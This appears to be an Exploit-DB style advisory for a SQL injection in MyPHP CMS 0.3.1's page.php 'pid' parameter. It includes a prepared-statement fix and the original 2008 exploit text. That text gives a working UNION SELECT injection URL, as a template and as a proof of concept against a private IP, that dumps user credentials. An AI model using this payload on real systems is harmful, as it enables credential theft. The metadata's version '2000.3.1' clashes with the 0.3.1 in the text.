Vendor: MyPHP CMS
By: CWH Underground
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: MyPHP CMS
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:myphpcms:myphpcms:0.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability

A vulnerability exists in MyPHP CMS 0.3.1 that allows an attacker to inject arbitrary SQL commands via the 'pid' parameter of the 'page.php' script. Magic quotes must be turned off for the attack to succeed. An attacker can exploit this vulnerability to dump usernames and passwords in clear text.

Mitigation:

Ensure that magic quotes are turned on and that all inputs are properly sanitized.
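Added example (not MyPHP CMS code): the page.php query quoted in the advisory below, rebuilt with a mysqli prepared statement so that the value of pid can never alter the SQL structure, regardless of the magic quotes setting. The function name, the table prefix whitelist and the connection credentials are assumptions; the original page.php interpolates $pid straight into the query string.

```php
<?php
// Hardened replacement for the advisory's page.php lookup (added example,
// not project code). Assumes mysqlnd is available for get_result().
function fetch_page(mysqli $db, string $table_prefix, string $pid): ?array
{
    // Identifiers cannot be bound as parameters, so the prefix is whitelisted
    // instead (assumption: prefixes are short alphanumeric strings).
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $table_prefix)) {
        throw new InvalidArgumentException('unexpected table prefix');
    }

    // Before (vulnerable, as quoted in the advisory):
    //   $psql = "SELECT * FROM ".$table_prefix."pages WHERE pid='$pid'";
    // After: a bound placeholder replaces the string interpolation, so a quote
    // character in $pid is data, not SQL syntax.
    $stmt = $db->prepare("SELECT * FROM {$table_prefix}pages WHERE pid = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $pid);   // 's': pid stays a string, as in the original query
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (connection details are placeholders):
$db = new mysqli('localhost', 'db_user', 'db_password', 'myphpcms');
$pid = $_GET['pid'] ?? '';
$prow = fetch_page($db, 'myphp_', $pid);
if ($prow === null) {
    http_response_code(404);
}
```

The same change applies to every other query in the CMS that builds SQL from request parameters; the prepared statement is the fix, while magic quotes only mask the symptom.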

Exploit-DB raw data:

===============================================================
  MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability
===============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MyPHP CMS
 VERSION     : 0.3.1
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/myphpcms
#####################################################

--- Remote SQL Injection ---

** Magic quotes must be turned off **

---------------------------------
 Vulnerable File [page.php?pid=]
---------------------------------

@Line

   13:   $psql = "SELECT  * FROM ".$table_prefix."pages WHERE pid='$pid'";
   14:   $pprocess = mysql_query ( $psql );
   15:   $prow = mysql_fetch_array ( $pprocess );

---------
 Exploit
---------

[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1

	This exploit can dump usernames and passwords in clear text.

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1



##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-25]